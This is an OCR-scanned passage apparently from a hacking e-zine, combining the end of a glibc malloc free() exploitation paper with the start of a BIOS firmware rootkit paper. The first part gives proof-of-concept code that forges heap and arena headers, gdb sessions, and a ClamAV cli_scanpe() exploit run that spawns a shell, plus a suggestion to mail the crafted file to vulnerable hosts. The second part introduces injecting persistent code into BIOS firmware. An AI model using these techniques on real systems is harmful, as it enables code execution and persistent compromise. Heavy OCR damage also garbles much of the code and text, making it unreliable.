(chunk_non_main_arena(ptr) ? heap_for_ptr(ptr)->ar_ptr : &main_arena) 
==— Snipa 
--- snip --- 
#define chunk_non_main_arena(p) ((p)->size & NON_MAIN_ARENA) 
SS=> Snip --= 
==> snip --= 
#define heap_for_ptr(ptr) \ 

((heap_info *) ((unsigned long) (ptr) & ~ (HEAP_MAX _SIZE-1))) 
=- > NSN. oss 


For a given chunk (like ’p’ in the previous snippet), glibc checks 
whether this chunk belongs to the main arena by looking at the 
‘size’ field. If the NON_MAIN_ARENA flag is set, heap_for_ptr() is 
called and the ’ar_ptr’ field is returned. Since the attacker 
controls the ’size’ field of a chunk during an overflow condition, 


she can set or unset this flag at will. But let’s see what’s the 
return value of heap_for_ptr() for some sample chunk addresses. 
==> (Snip -== 


include <stdio.h> 
include <stdlib.h> 


define HEAP_MAX_SIZE (1024*1024) 


define heap_for_ptr(ptr) \ 
((void *) ((unsigned long) (ptr) & ~ (HEAP_MAX_SIZE-1))) 


int main(int argc, char *argv[]) { 
size t i, n; 


6.txt Wed Apr 26 09:43:46 2017 11 
void *chunk, *heap; 
if(arge != 2) { 
fprintf(stderr, "%s <n>\n", argv[0]); 


return -1; 


} 


if((n = atoi(argv[1])) <= 0) 
return -1; 


chunk = heap = NULL; 


for(i = 0; i < n; itt) { 
while( (chunk = malloc(1024)) != NULL) { 
if (heap_for_ptr(chunk) != heap) { 
heap = heap_for_ptr (chunk); 
break; 


} 


fprintf(stderr, "%.2d heap address: %p\n", 
itl, heap); 
} 


return 0; 


} 


--- snip --- 
Let’s compile and run. 


SS> (SNP t=z= 

S$ ./test 10 

Ol heap address: 0x8000000 
02 heap address: 0x8100000 
03 heap address: 0x8200000 
04 heap address: 0x8300000 
05 heap address: 0x8400000 
06 heap address: 0x8500000 
07 heap address: 0x8600000 
08 heap address: 0x8700000 
09 heap address: 0x8800000 
10 heap address: 0x8900000 
==> “SNnipy => 


This code prints the first N heap addresses. So, for a chunk that 
has an address of Oxdeadbeef, its heap location is at most 1Mbyte 
backwards. Precisely, chunk Oxdeadbeef belongs to heap Oxdead00000. 
So if an attacker controls the location of a chunk’s theoretical 
heap address, then by overflowing the ’size’ field of this chunk, 
they can fool free() to assume that a valid heap header is stored 
there. Then, by carefully setting up fake heap and arena headers, 

an attacker may be able to force unsorted_chunks() to return a value 
of their choice. 


This is not a rare situation; in fact this is how most real life 
heap exploits work. Forcing the target application to perform a 
number of continuous allocations, helps the attacker control the 
arena header. Since the heap is not randomized and the chunks are 
sequentially allocated, the heap addresses are static and can be 
used across all targets! Even if the target system is equipped with 
the latest kernel and has heap randomization enabled, the heap 
addresses can be easily brute forced since a potential attacker 
only needs to know the upper part of an address rather than some 
specific location in the virtual address space. 


Notice that the code shown in the previous snippet always produces 
the same results and precisely the ones depicted above. That is, 
given the approximation of the address of some chunk one tries to 
overflow, the heap address can be easily precalculated using 


6.txt Wed Apr 26 09:43:46 2017 12 
heap_for_ptr(). 


For example, suppose that the last chunk allocated by some application 
is located at the address 0x080XXXXX. Suppose that this chunk belongs 
to the main arena, but even If it wouldn’t, its heap address would 

be 0x080XXXXX & Oxfff00000 = 0x08000000. All one has to do is to 

force the application perform a number of allocations until the 

target chunk lies beyond 0x08100000. Then, if the target chunk has 

an address of 0x081XXXXX, by overflowing its ’size’ field, one can 
make free() assume that it belongs to some heap located at 0x08100000. 
This area is controlled by the attacker who can place arbitrary 

data there. When public_fREe() is called and sees that the heap 
address for the chunk to be freed is 0x08100000, it will parse the 
data there as if it were a valid arena. This will give the attacker 
the chance to control the return value of unsorted_chunks(). 


---[ VI. Creating fake heap and arena headers 


Once an attacker controls the contents of the heap and arena headers, 
what are they supposed to place there? Placing random arbitrary 
values may result in the target application getting stuck by entering 
endless loops or even segfaulting before its time, so, one should 

be careful in not causing such side effects. In this section, we 

deal with this problem. Proper values for various fields are shown 
and an exploit for our example code is developed. 


Right after entering _int_free(), do_check_chunk() is called in 
order to perform lightweight sanity checks on the chunk being freed. 
Below is a code snippet taken from the aforementioned function. 
Certain pieces were removed for clarity. 


-—-- snip --- 
char *max_address = (char*) (av->top) + chunksize(av->top) ; 
char *min_address = max_address av->system_mem; 
if(p != av->top) { 
if (contiguous(av)) { 
assert (((char*)p) >= min_address) ; 
assert (((char*)p + sz) <= ((char*) (av->top))); 
} 
} 
-—-- snip --- 


The do_check_chunk() code fetches the pointer to the topmost chunk 
as well as its size. Then ’max_address’ and /min_address’ get the 
values of the higher and the lower available address for this arena 
respectively. Then, ’p’, the pointer to the chunk being freed is 
checked against the pointer to the topmost chunk. Since one should 
not free the topmost chunk, this code is, under normal conditions, 
bypassed. Next, the arena named ‘av’, is tested for contiguity. If 
it’s contiguous, chunk ’p’ should fall within the boundaries of its 
arena; if not the checks are kindly ignored. 


So far there are two restrictions. The attacker should provide a 
valid 'av->top’ that points to a valid ’size’ field. The next set 
of restrictions are the assert() checks which will mess the 
exploitation. But let’s first focus on the macro named contiguous(). 


--- snip --- 
#define NCONTIGUOUS_BIT (2U 
#define contiguous (M) ((( 
= snip. so 


) 
M)->flags & NONCONTIGUOUS_BIT) == 0) 


Since the attacker controls the arena flags, if they set it to some 
integer having the third least significant bit set, then contiguous (av) 
is false and the assert() checks are ignored. Additionally, providing 
an ’av->top’ pointer equal to the heap address, results in ’max_address’ 
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and ’min_address’ getting valid values, thus avoiding annoying 
segfaults due to invalid pointer accesses. It seems that the first 
set of problems was easily solved. 


Do you think it’s over? Hell no. After some lines of code are 
executed, _int_free() uses the macro __builtin_expect() to check 

if the size of the chunk right next to the one being freed (the 
third chunk) is larger than the total available memory of the arena. 
This is a good measure for detecting overflows and any decent 
attacker should get away with it. 


--- snip --- 
nextsize = chunksize(nextchunk) ; 
if (__builtin_expect (nextchunk->size <= 2 * SIZE_SZ, 0) 
|| __builtin_expect (nextsize >= av->system_mem, 0)) { 
errstr = "free(): invalid next size (normal)"; 


goto errout; 


} 


--- snip --- 


By setting ’av->system_mem’ equal to Oxffffffff, one can bypass any 
check regarding the available memory and obviously this one as well. 
Although important for the internal workings of malloc(), the 
‘av->max_system_mem’ field can be zero since it won’t get on the 
attacker’s way. 


Unfortunately, befor ven reaching _int_free(), in public_fREe(), 
the mutex for the current arena is locked. Here’s the snippet trying 
to achieve a valid lock sequence. 


=== snip => 
#i£ THREAD STATS 

if (!'mutex_trylock (&ar_ptr->mutex) ) 
(ar_ptr->stat_lock_direct); 
else { 
mutex_lock (&ar_ptr->mutex) ; 
(ar_ptr->stat_lock_wait) ; 


} 
else 

mutex_lock (&ar_ptr->mutex) ; 
endif 
===46ni poss 


In order to see what happens I had to delve into the internals of 
the NPTL library (also part of glibc). Since NPTL is out of the 
scope of this article I won’t explain everything here. Briefly, the 
mutex is represented by a pthread_mutex_t structure consisting of 

5 integers. Giving invalid or random values to these integers will 
result in the code waiting until mutex’s release. After messing 
with the NPTL internals, I noticed that setting all the integers 

to 0 will result in the mutex being acquired and locked properly. 
The code then continues execution without further problems. 


Right now there are no more restrictions, we can just place the 
value 0x08100020 (the heap header offset plus the heap header size) 
in the ’ar_ptr’ field of the _heap_info structure, and give the 
value retloc-12 to bins[0] (where retloc is the return location 
where the return address will be written). Recall that the return 
address points to the /’prev_size’ field of the chunk being freed, 
an integer under the attacker’s control. What should one place 
there? This is another problem that needs to be solved. 


Since only a small amount of bytes is needed for the heap and the 
arena headers at 0x08100000 (or similar address), one can use this 
area for storing shellcode and nops as well. By setting the ’prev_size’ 
field of the chunk being freed equal to a JMP instruction, one can 
branch some bytes ahead or backwards so that execution is transfered 
somewhere in 0x08100000 but, still, after the heap and arena headers! 
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Valid locations are 0x08100000+X with X >= 72, that is, X should 
be an offset after the heap header and after bins[0]. This is not 
as complicated as it sounds, in fact, all addresses needed for 
exploitation are static and can be easily precalculated! 


The code below triggers a ’4 bytes anywhere’ condition. 


--- snip --- 

include <stdio.h> 
include <stdlib.h> 
include <string.h> 


int main() { 
char buffer[65535], *arena, *chunks; 


/* Clean up the buffer. */ 
bzero(buffer, sizeof (buffer) ); 


/* Pointer to the beginning of the arena header. */ 
arena = buffer + 360; 

/* Pointer to the arena header offset 0. */ 
*(unsigned long int *)&arena[0O] = 0x08100000 + 12; 
/* Arena flags -- offset 16. */ 

*(unsigned long int *)&arena[16] = 2; 

/* Pointer to fake top offset 60. */ 

*(unsigned long int *) éarena[60 = 0x08100000; 

/* Return location minus 12 -- offset 68. */ 
*(unsigned long int *) &éarena[68 = 0x41414141 - 12; 
/* Available memory for this arena -—- offset 1104. */ 
*(unsigned long int *)&arena[1104] = Oxffffffff; 

/* Pointer to the second chunk’s prev_size (shellcode). */ 
chunks = buffer + 10240; 

*(unsigned long int *)&chunks[0] = Oxdeadbeef; 


/* Pointer to the second chunk. */ 
chunks = buffer + 10244; 


/* Size of the second chunk (PREV_INUSE+NON_MAIN_ARENA). */ 
*(unsigned long int *)échunks[0] = 0x00000055; 


/* Pointer to the third chunk. */ 
chunks = buffer + 10244 + 80; 


/* Size of the third chunk (PREV_INUSE). */ 
*(unsigned long int *)&chunks[0] = 0x00000051; 


/* Pointer to the fourth chunk. */ 
chunks = buffer + 10244 + 80 + 80; 


/* Size of the fourth chunk (PREV_INUSE). */ 
*(unsigned long int *)&chunks[0] = 0x00000051; 


write(1, buffer, 10244 + 80 + 80 + 4); 
return; 


} 


—-- snipe --- 


a3 (snipe hoa 

S gcc exploit.c -o exploit 
$ ./exploit > VECTOR 

S gdb -q ./test 

(gdb) b _int_free 
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Function "_int_free" not defined. 
Make breakpoint pending on future shared library load? (y or [n]) y 
Breakpoint 1 (_int_free) pending. 


(gdb) run 722 1024 < VECTOR 

Starting program: /home/huku/test 722 1024 < VECTOR 
~] Allocated 1024 bytes at 0x804a008-0x804a408 

~] Allocated 1024 bytes at 0x804a410-0x804a810 

~“] Allocated 1024 bytes at 0x804a818-0x804ac18 


~“] Allocated 1024 bytes at 0x80ffa90-0x80ffe90 
~] Chunk 1 at 0x80ffe98-0x8100298 
~] Chunk 2 at 0x81026a0 
~] Chunk 3 at 0x81026f0 
~] Chunk 4 at 0x8102740 
~“] Freeing 0x81026a0 


Breakpoint 1, _int_free (av=0x810000c, mem=0x81026a0) at malloc.c:4552 


4552 Pp = mem2chunk (mem) ; 
(gdb) print *av 


Sl = {mutex = 1, flags = 2, fastbins = {0x0, 0x0, 0x0, 0x0, Ox0, Ox0, 


0x0, 


Ox0, Ox0, Ox0}, top = 0x8100000, last_remainder = 0x0, bins = {0x41414135, 


Ox0 <repeats 253 times>}, 


binmap = {0, 0, 0, O}, next = 0x0, system_mem = 4294967295, 
max_system_mem = 0} 
SSP peo 


It seems that all the values for the arena named ‘av’, are in 
position. 


--- snip --- 
(gdb) cont 
Continuing. 


Program received signal SIGSEGV, Segmentation fault. 
_int_free (av=0x810000c, mem=0x81026a0) at malloc.c:4698 


4698 fwd->bk = p; 
(gdb) print (void *) fwd 
$2 = (void *) 0x41414135 


(gdb) print (void *) fwd->bk 

Cannot access memory at address 0x41414141 
(gdb) print (void *)p 

$3 = (void *) 0x8102698 

(gdb) x/4bx p 


0x8102698: Oxef Oxbe Oxad Oxde 
(gdb) q 

The program is running. Exit anyway? (y or n) y 
=-> Snip <-- 


Indeed, ’fwd->bk’ is the return location (0x41414141) and ’p’ is 
the return address (the address of the ’prev_size’ of the second 
chunk). The attacker placed there the data Oxdeadbeef. So, it’s now 
just a matter of placing the nops and the shellcode at the proper 
location. This is, of course, left as an exercise for the reader 
(the .dtors section is your friend) :-) 


---[ VII. Putting it all together 


It’s now time to develop a logical plan of what some attacker is 
supposed to do in order to take advantage of such a security hole. 
Although it should be quite clear by now, the steps required for 
successful exploitation are listed below. 


* An attacker must force the program perform sequential allocations 
in the heap and eventually control a chunk whose boundaries contain 
the new theoretical heap address. For example, if allocations start 
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at Ox080XXXXX then they should allocate chunks until the one they 
control contains the address 0x08100000 within its bounds. The 
chunks should be larger than 64 bytes but smaller than the mmap() 


threshold. 


If the target program has already performed several 


allocations, it is highly possible that allocations start at 


0x08100000. 


* An attacker must make sure that they can overflow the chunk right 
next to the one under their control. For example, if the chunk from 
OxO080XXXXX to 0x08101000 is under control, then chunk 0x08101001- 

Ox0810XXXX should be overflowable (or just any chunk at 0x081XXxXxXxX). 


* A fake heap header followed by a fake arena header should be 
aD 


placed 


at 0x08100000. Their base addresses 


n the VA space are 


0x08100000 and 0x08100000 + sizeof(struct _heap_info) respectively. 
The bins[0] field of the fake arena header should be set equal to 
the return location minus 12 and the rules described in the previous 
section should be followed for better results. If there’s enough 
room, one can also add nops and shellcode there, 
imagination is the only solution (the contents of the following 


chunk are under the attacker’s control as well). 


* A heap overflow shoul 
or Similar functions. 


if not then 


ld be forced via a memcpy(), bcopy(), read() 
The exploitation vector should be just like 


the one created by the code in the previous section. Schematically, 
it looks like the following figure (the pipe character indicates 


the chunk boundaries). 


[heap_hdr] [arena_hdr] 


| 


room, 


arena_hdr] > Th fake arena header. 


—-> Irrelevant data, garbage, alphas etc. 
one can place nops and shellcode here. 


AAAA] -> The size of the second chunk plus PREV_INUS 
NON_MATN_ARENA. 


CCCC] -> The size of the fourth chunk plus PREV_INUS 


...] | [AAAA] [...] | [BBBB] [...] | [CCCC] 


heap_hdr] -> The fake heap header. It should be placed on an 
address aligned to 1Mb e.g 0x08100000. 


If there’s enough 


al 


and 


BBBB] -> The size of the third chunk plus PREV_INUSE. 


eal 


* The attacker should be patient enough to wait until the chunk 
right next to the one she controls is freed. Voila! 


Although this technique can be quite lethal as well as straightforward, 
unfortunately it’s not as generic as the heap overflows of the good 
old days. That is, when applied, it can achieve immediate and 
trustworthy results. However, it has a higher complexity than, for 
example, common stack overflows, thus certain prerequisites should 

be met befor ven someone attempts to deploy such an attack. More 


precisely, the following conditions should be true. 


* The target chunks should be larger than 64 bytes and less than 
the mmap() threshold. 


* An attacker must have the ability to control 4 


either 


sequential chunks 


directly allocated or fake ones constructed by them. 


* An attacker must have the ability to write null 
one should be able to overflow the chunks via memcpy(), bcopy(), 


read () 


or Similar since strcpy() or strncpy() wil 


l bytes. That is, 


ll not work! This 


is probably the most important precondition for this technique. 
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-—--[ VIII. The ClamAV case 


--[ 1. The bug 


Let’s use the knowledge described so far to build a working exploit 

for a known application. After searching at secunia.com for heap 
overflows, I came up with a list of possible targets, the most 

notable one being ClamAV. The cli_scanpe() integer overflow was a 
really nice idea, so, I decided to research it a bit (the related 
advisory is published at [12]). The exploit code for this vulnerability, 
called /’antiviroot’, can be found in the ’Attachments’ section in 
uuencoded format. 


Before attempting to audit any piece of code, the potential attacker 
is advised to build ClamAV using a custom version of glibc with 
debugging symbols (I also modified glibc a bit to print various 
stuff). After following Chariton’s ideas described at [11], one can 
build ClamAV using the commands of the following snippet. It is 
rather complicated but works fine. This trick is really useful if 
one is about to use gdb during the exploit development. 


--- snip --- 
S$ export LDFLAGS=-L/home/huku/test_builds/lib -L/usr/local/lib -L/usr/lib 
S$ export CFLAGS=-00 -nostdinc \ 

> -I/usr/lib/gcec/i686-pc-linux-gnu/4.2.2/include \ 

> -I/home/huku/test_builds/include -I/usr/include -I/usr/local/include \ 
> 

> 

> 

$ 


-W1,-z,nodeflib \ 
W1,-rpath=/home/huku/test_builds/lib -B /home/huku/test_builds/lib \ 
-W1,--dynamic-linker=/home/huku/test_builds/lib/ld-linux.so.2 
./configure --prefix=/usr/local && make && make install 

--- snip --- 


When make has finished its job, we have to make sure everything is 
ok by running ldd on clamscan and checking the paths to the shared 
libraries. 


So> “Snip <--> 

S$ ldd /usr/local/bin/clamscan 

linux-gate.so.1l => (0Oxb7ef4000) 

libclamav.so.2 => /usr/local/lib/libclamav.so.2 (0xb7e4e000) 

libpthread.so.0 => /home/huku/test_builds/lib/libpthread.so.0 (0xb7e37000) 

libc.so.6 => /home/huku/test_builds/lib/libc.so.6 (0xb7d08000) 

libz.so.1 => /usr/lib/libz.so.1 (0xb7cf£5000) 

libbz2.so.1.0 => /usr/lib/libbz2.so.1.0 (0xb7ce5000) 

libnsl.so.1 => /home/huku/test_builds/lib/libnsl.so.1 (0xb7cd0000) 
/nome/huku/test_builds/lib/ld-linux.so.2 (Oxb7ef5000) 

--- snip --- 


Now let’s focus on the buggy code. The actual vulnerability exists 
in the preprocessing of PE (Portable Executable) files, the well 

known Microsoft Windows executables. Precisely, when ClamAV attempts 
to dissect the headers produced by a famous packer, called MEW, an 
integer overflow occurs which later results in an exploitable 
condition. Notice that this bug can be exploited using various 
techniques but for demonstration purposes I’1l1 stick to the one I 
presented here. In order to have a more clear insight on how things 
work, you are also advised to read the Microsoft PE/COFF specification 
[13] which, surprisingly, is free for download. 


Here’s the vulnerable snippet, libclamav/pe.c function cli_scanpe(). 
I actually simplified it a bit so that the exploitable part becomes 
more clear. 


--- snip --- 
ssize = exe_sections[i + 1].vsz; 
dsize = exe_sections[i].vsz; 
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src = cli_calloc(ssiz dsize, sizeof(char)); 


bytes = read(desc, src dsize, exe_sections[i + 1].rsz); 
sa isnap ess 


First, ‘’ssize’ and ’dsize’ get their initial values which are 
controlled by the attacker. These values represent the virtual size 
of two contiguous sections of the PE file being scanned (don’t try 
to delve into the MEW packer details since you won’t find any 
documentation which will be useless even if you will). The sum of 
these user supplied values is used in cli_calloc() which, obviously, 
is just a calloc() wrapper. This allows for an arbitrary sized heap 
allocation, which can later be used in the read operation. There 

ar ndless scenarios here, but lets see what are the potentials 

of achieving code execution using the new free() exploitation 
technique. 


Several limitations that are imposed before the vulnerable snippet 
is reached, make the exploitation process overly complex (MEW fixed 
offsets, several bound checks on PE headers etc). Let’s ignore them 
for now since they are only interesting for those who are willing 
to code an exploit of their own. What we are really interested in, 


is just the core idea behind this exploit. 


Since ’dsize’ is added to ’src’ in the read() operation, the attacker 
can give ’dsize’ such a value, so that when added to ’src’, the 

heap address of ’src’ is eventually produced (via an integer 
overflow). Then, read(), places all the user supplied data there, 
which may contain specially crafted heap and arena headers, etc. 

So schematically, the situation looks like the following figure 
(assuming the ’src’ pointer has a value of Oxdeadbeef) : 


Oxdea00000 Oxdeadbeef 


Heap hdr Arena hdr Chunk ‘’src’ Other chunks 


So, if one manages to overwrite the whole region, from the heap 
header to the ’src’ chunk, then they can also overwrite the chunks 
neighboring ‘src’ and perform the technique presented earlier. But 
there are certain obstacles which can’t be just ignored: 


* From Oxdea00000 to Oxdeadbeef various chunks may also be present, 
and overwriting this region may result in premature terminations 
of the ClamAV scan process. 


* 3 More chunks should be present right after the ’src’ chunk and 
they should be also alterable by the overflow. 


* One needs the actual value of the ’src’ pointer. 


Fortunately, there’s a solution for each of them: 


* One can force ClamAV not to mess with the chunks between the heap 
header and the ’src’ chunk. An attacker may achieve this by following 
a precise vulnerable path. 


* Unfortunately, due to the heap layout during the execution of the 
buggy code, there are no chunks right after ’srce’. Even if there 
were, one wouldn’t be able to reach them due to some internal size 
checks in the cli_scanpe() code. After some basic math calculations 
(not presented here since they are more or less trivial), one can 
prove that the only chunk they can overwrite is the chunk pointed 
by ‘sre’. Then, cli_calloc() can be forced to allocate such a chunk, 
where one can place 4 fake chunks of a size larger than 72. This 

is exactly the same situation as having 4 contiguous preallocated 
heap chunks! :-) 
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AS 
the 


ince the heap is, by default, not randomized, one can precalculate 
'src’ value using gdb or some custom malloc() debugger (just 


like I did). This specific bug is hard to exploit when randomization 
is enabled. On the contrary, the general technique presented in 


thi 


Opt 


s article, is immune to such security measures. 


ionally, an attacker can force ClamAV allocate the ’src’ chunk 


somewhere inside a heap hole created by realloc() or free(). This 
allows for the placement of the target chunk some bytes closer to 


the 


fake heap and arena headers, which, in turn, may allow for 


bypassing certain bound checks. Before the vulnerable snippet is 
reached, the following piece of code is executed: 


snip --- 


section_hdr = (struct pe_image_section_hdr *)cli_calloc(nsections, 


Ss 


izeof(struct pe_image_section_hdr)); 


exe_sections = (struct cli_exe_section *)cli_calloc(nsections, 


Ss 


izeof (struct cli_exe_section)); 


free (section_hdr); 


Thi 


snip --- 


s creates a hole at the location of the ’section_hdr’ chunk. By 


carefully computing values for ’dsize’ and ’ssize’ so that their 
sum equals the product of /nsections’ and ’sizeof (struct 


pe_ 


image_section_hdr)’, one can make cli_calloc() reclaim the heap 


hole and return it (this is what antiviroot actually does). Notice 
that apart from the aforementioned condition, the value of ’dsize’ 
should be such, so that ’srce + dsize’ equals to the heap address 


of 


'sre’ (a.k.a. ‘heap_for_ptr(src)’). 


Finally, in order to trigger the vulnerable path in malloc.c, a 
free() should be issued on the ’src’ chunk. This should be performed 


as 


soon as possible, since the MEW unpacking code may mess with the 


contents of the heap and eventually break things. Hopefully, the 


following code can be triggered in the ClamAV source. 
==>) -6n1 py as 
if (buff[0x7b] == ’\xe8’) { 


i 


} 
} 


f£(!CLI_ISCONTAINED (exe_sections[1].rva, exe _sections[1].vsz, 
cli_readint32 (buff + Ox7c) + fileoffset + 0x80, 4)) f 


free(src); 


snip --- 


By planting the value Oxe8 in offset Ox7b of ’buff’ and by forcing 


CLI_ISCONTAINED() to fail, one can force ClamAV to call free() on 


the 


"srce’ chunk (the chunk whose header contains the NON _MAIN_ ARENA 


flag when the read() operation completes). A ’4 bytes anywhere’ 
condition eventually takes place. In order to prevent ClamAV from 


cra 


shing on the next free(), one can overwrite the .got address of 


free() and wait. 


a! 


So, 
inf 
the 
whi 


2. The exploit 


here’s how the exploit for this ClamAV bug looks like. For more 
o on the exploit usage you can check the related README file in 
attachment. This code creates a specially crafted .exe file, 
ch, when passed to clamscan, spawns a shell. 
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== Ygnip ses 

S ./antiviroot -a 0x98142e0 -r 0x080541a8 -s 441 
CLAMAV 0.92.x cli_scanpe() EXPLOIT / antiviroot.c 
huku / huku _at_ grhack _dot_ net 


Using address=0x098142e0 retloc=0x080541a8 size=441 file=exploit.exe 
Corrected size to 480 

~] Chunk 0x098142e0 has real address 0x098142d8 

Chunk 0x098142e0 belongs to heap 0x09800000 

~] 0x098142d8-0x09800000 = 82648 bytes space (0.08M) 

Calculating ssize and dsize 

~“] dsize=O0xfffebd20 ssize=0x000144c0 size=480 

~] addr=0x098142e0 + dsize=0xfffebd20 = 0x09800000 (should be 0x09800000) 
~] dsize=0Oxfffebd20 + ssize=0x000144c0 = 480 (should be 480) 

~“] Available space for exploitation 488 bytes (0.48K) 

Done 


S /usr/local/bin/clamscan exploit.exe 
Libcl amAV Warning: KKEKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK 


ibClamAV Warning: *** The virus database is older than 7 days. *** 


LibClamAV Warning: *** Please update it IMMEDIATELY! aot 
‘1 OCe] amAV Warning: KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK 


sh-3.2S echo yo 
yo 

sh-3.2S exit 
exit 

--- snip --- 


A more advanced scenario would be attaching the executable file and 
mailing it to a couple of vulnerable hosts and... KaBooM! Eventually, 
it seems that our technique is quite lethal even for real life 
scenarios. More advancements are possible, of course, they are left 
as an exercise to the reader :-) 


---[ IX. Epilogue 


Personally, I belong with those who believe that the future of 
exploitation lies somewhere in kernelspace. The various userspace 
techniques are, like g463 said, more or less ephemeral. This paper 
was just the result of some fun I had with the glibc malloc() 
implementation, nothing more, nothing less. 


Anyway, all that stuff kinda exhausted me. I wouldn’t have managed 
to write this article without the precious help of GM, eidimon and 
Slasher (yo guys!). 


Dedicated to the r00thell clique -- Wherever you are and whatever 
you do, I wish you guys (and girls ;-) all the best. 
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[ 0.- Foreword 


Dear reader, if you’re here we can assume that you already know what 
the BIOS is and how it works. Or, at least, you have a general 
picture of what the BIOS does, and its importance for the normal 
operation of a computer. Based on that, we will briefly explain some 
basic concepts to get you into context and then we’1l jump to the, 
more relevant, technical stuff. 


aoe Se [ 1.- Introduction 
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Over the years, a lot has been said about this topic. But, apart of 
the old Chernobyl virus, which just zeroed the BIOS if you 
motherboard was one of the supported, or some modifications with 
modding purposes (that were a very valuable source of data, btw) 
like Pinczakko’s work, we wouldnt be able to find any public 
implementation of a working, generical and malicious BIOS infection. 


Mostly, the people tends to think that this is a very researched, 

old and already mitigated technique. It is sometimes even confused 
whith the obsolet MBR viruses. But, is our intention to show that 

this kind of attacks are possible and could be, with the aproppiated 
OS detection and infection techniques, a very trustable and persistent 
rootkit residing just inside of the BIOS Firmware. 


In this paper we will show a generic method to inject code into 
unsigned BIOS firmwares. This technique will let us embedd our own 
code into the BIOS firmware so that it will get executed just before 
the loading of the operating system. 


We will also demonstrate how having complete control of the hard 
drives allows us to leverage true persistency by deploying fully 
functional code directly into a windows process or just by modifying 
sensitive OS data in a Linux box. 


---[ 1.1 - Paper structure 


The main idea of this paper is to show how the BIOS firmware can be 
modified and used as a persistence method after a successful 
intrusion. 


So, we will start by doing a little introduction and then we will 
focus the paper on the proof of concept code, splitting the paper 
in two main sections: 


— VMWare’s (Phoenix) BIOS modification 
—- Real (Award) BIOS modification 


In each one we will explain the payloads to show how the attack is 
done, and then we’1l jump directly to see the payload code. 


Aaa SS [ 2.- BIOS Basics 
---[2.1 - BIOS introduction 


From Wikipedia [1]: 
"The BIOS is boot firmware, designed to be the first code run by a 
PC when powered on. The initial function of the BIOS is to identify 
test, and initialize system devices such as the video display card, 
hard disk, and floppy disk and other hardware. This is to prepare 
the machine into a known state, so that software stored on 
compatible media can be loaded, executed, and given control of the 
PC.[3] This process is known as booting, or booting up, which is 
short for bootstrapping." 


"...provide a small library of basic input/output functions that 
can be called to operate and control the peripherals such as the 
keyboard, text display functions and so forth. In the IBM PC and 
AT, certain peripheral cards such as hard-drive controllers and 
video display adapters carried their own BIOS extension ROM, which 
provided additional functionality. Operating systems and executive 
software, designed to supersede this basic firmware functionality, 
will provide replacement software interfaces to applications. 


---[2.1.1 - Hardware 
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Back in the 80’s the BIOS firmware was contained in ROM or PROM 
ld not be altered in any way, but nowadays, 
‘EPROM (Electrically Erasable 


3 


support new hardware and to add new 


The BIOS has a very important role in the functioning of a 


computer. 


It should be always available as 
executed by the CPU when it is turned on. 


in a ROM. 


The first module of the BIOS is called Bootblock, 


charge of the POST 


The modern BIOS has a modular structure, 
several modules integrated on the same firmware, 
of a different specific task; 


security measures. 


(Power-on self-test) 
procedures. POST is the common term for a computer, 
printer’s pre-boot sequence. 


and 


Emergency boot 


thi 


it holds the first instruction 
This is why it is stored 


and it’s in 


router or 


Ss 


It has to test and initialize almost 
all the different hardware components in the system to make sure 
everything is working properly. 


Each module is compressed, 


therefor 


ther 


routine in charge of the decompression and validation of the 
subsequently ex 


others modules that will b 


After decompression, 
PCI Roms (if needed) 
hard drive (MBR) 


Operating System. 


and at the end, 
looking for a boot loader to start loading the 


---[2.2 - Firmware file structure 


As we said before, 


stored in a normal 


compressed modu] 
However, not all 


becaus 


Les, 


they ar 


some other hardware is initialized, 


cuted. 


is a decompression 


such as 


it reads the sector 0 of the 


the BIOS firmware has a modular structure. 
plain file, it is composed of several LZ 


H 


each of them containing an 8 bit checksum. 


l the modules are compressed, 
Bootblock and the Decompression routine are obviously uncompressed 
a fundamental piece of the booting process and 

must perform the decompression of the other modules. 


a few modules like the 


we will see why this is so convenient for our purposes. 


Here we have th 


BIOS Firmware ROMs 


output of Phnxdeco 
repositories), an open source tool to parse and analyze the Phoenix 


(available in the Debian 


(that we’1ll going to extract at 3.1.1): 


Further, 


When 


which means that there are 
each one in charge 
from hardware initialization to 


Class.Instance (Name) Packed ---> Expanded Compression Offse 
B03 ( BIOSCODE) O6DAF (28079) => O093F0O ( 37872) LZINT ( 74%) 446DFh 
B.02 ( BIOSCODE) O5B87 (23431) => O87A4 ( 34724) LZINT ( 67%) 4B4A9h 
B.O1 ( BIOSCODE) O5A36 (23094) => O80E0 ( 32992) LZINT ( 69%) 5104Bh 
C.00 ( UPDATE) 03010 (12304) => 03010 ( 12304) NONE (100%) 5CFDFh 
X.01 ( ROME XEC) 01110 (04368) => 01110 ( 4368) NONE (100%) 6000Ah 
T.00 ( TEMPLATE) 02476 (09334) => O55EO ( 21984) LZINT ( 42%) 63D78h 
S.00 ( STRINGS) O20AC (08364) => O47EA ( 18410) LZINT ( 45%) 66209h 
E.00 ( SETUP) O3AE6 (15078) => 09058 ( 36952) LZINT ( 40%) 682D0h 


7.txt Wed Apr 26 09:43:46 2017 4 


M.0O ( MISER) 03095 (12437) => 046D0 ( 18128) LZINT ( 68%) 
L.O1 ( LOGO) O1A23 (06691) => 246B2 (149170) LZINT ( 4%) 
L.0O ( LOGO) 00500 (01280) => 03752 ( 14162) LZINT ( 9%) 
X.00 ( ROMEXEC) O6A6C (27244) => O6AGC ( 27244) NONE (100%) 
B.00 ( BIOSCODE) OO1DD (00477) => OD740 ( 55104) LZINT ( 0%) 
*.00 ( TCPA_*) 00004 (00004) => 00004 ( 004) NONE (100%) 
D.O0O0 ( DISPLAY) OOAF1 (02801) => OOFEO ( 4064) LZINT ( 68%) 
G.00 ( DECOMPCODE) O006D6 (01750) => 006D6 ( 1750) NONE (100%) 
A.01 ( ACPI) O005B (00091) => 00074 ( 116) LZINT ( 78%) 
A.00 ( ACPT) O12FE (04862) => 0437C ( 17276) LZINT ( 28%) 
B.00 ( BIOSCODE) OOBDO (03024) => OOBDO ( 3024) NONE (100%) 
We can s here the different parts of the Firmware file, 


containing the DECOMPCODE section, where the decompression routine 
is located, as well as the other not-covered-in-this-—paper 
sections. 


---[2.3 - Update/Flashing process 


The BIOS software is not so different from any other software. 

It’s prone to bugs in the same way as other software is. 

Newer versions come out adding support for new hardware, features 
and fixing bugs, etc. But the flashing process could be very 
dangerous on a real machine. The BIOS is a fundamental component 

of the computer. It’s the first piece of cod xecuted when a 
machine is turned on. This is why we have to be very carefully when 
doing this kind of things. A failed BIOS update can -and probably 
will- leave the machine unresponsive. And that just sucks. 


That is why it’s so important to have some testing platform, such 
